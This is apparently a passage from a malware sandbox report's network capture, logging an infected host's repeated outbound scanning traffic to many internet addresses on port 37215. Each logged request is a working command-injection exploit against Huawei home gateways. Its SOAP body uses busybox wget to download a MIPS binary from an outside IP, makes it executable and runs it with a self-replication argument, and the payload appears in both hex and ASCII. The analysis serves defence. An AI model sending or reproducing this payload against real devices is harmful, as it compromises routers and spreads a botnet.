                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2916192.168.2.2343108157.102.45.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.660590887 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2917192.168.2.2348110121.250.3.15237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.660775900 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2918192.168.2.2360720197.26.53.22337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.661170006 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2919192.168.2.2338176157.209.224.8437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.661181927 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2920192.168.2.2350216157.243.78.5237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.661554098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2921192.168.2.233914641.189.51.7737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.661565065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2922192.168.2.2358374185.239.184.4437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.661675930 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2923192.168.2.235639641.222.9.18137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.661689043 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2924192.168.2.2338824157.178.28.1537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.661696911 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2925192.168.2.2343542197.39.199.24737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.661905050 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
